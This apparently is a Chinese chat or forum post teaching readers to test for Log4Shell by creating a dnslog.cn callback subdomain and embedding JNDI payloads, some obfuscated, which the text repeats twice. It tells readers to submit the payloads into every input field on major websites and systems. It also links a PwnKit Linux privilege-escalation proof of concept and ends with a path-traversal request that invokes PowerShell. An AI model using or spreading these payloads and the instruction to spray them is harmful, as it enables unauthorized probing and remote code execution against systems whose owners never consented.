教大家怎么玩吧,很简单:http://www.dnslog.cn/ 点击getsubdomain,一键生成域名,比如是abc.dnslog.cn
将这个域名放进payload,比如:
${${::-j}ndi:rmi://abc.dnslog.cn/ass}
或
${jndi:rmi://abc.dnslog.cn}
或
${${lower:jndi}:${lower:rmi}://abc.dnslog.cn/poc}
在各大网站、系统能输入的地方都发、写入这些串,然后在dnslog页面刷新等结果就好了
将这个域名放进payload,比如:
${${::-j}ndi:rmi://abc.dnslog.cn/ass}
或
${jndi:rmi://abc.dnslog.cn}
或
${${lower:jndi}:${lower:rmi}://abc.dnslog.cn/poc}
在各大网站、系统能输入的地方都发、写入这些串,然后在dnslog页面刷新等结果就好了
dnslog.cn
DNSLog Platform
DNSLog平台
几小时前新出炉的Linux“几乎”通杀提权:https://github.com/arthepsy/CVE-2021-4034
GitHub
GitHub - arthepsy/CVE-2021-4034: PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) - arthepsy/CVE-2021-4034
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+" + cmd)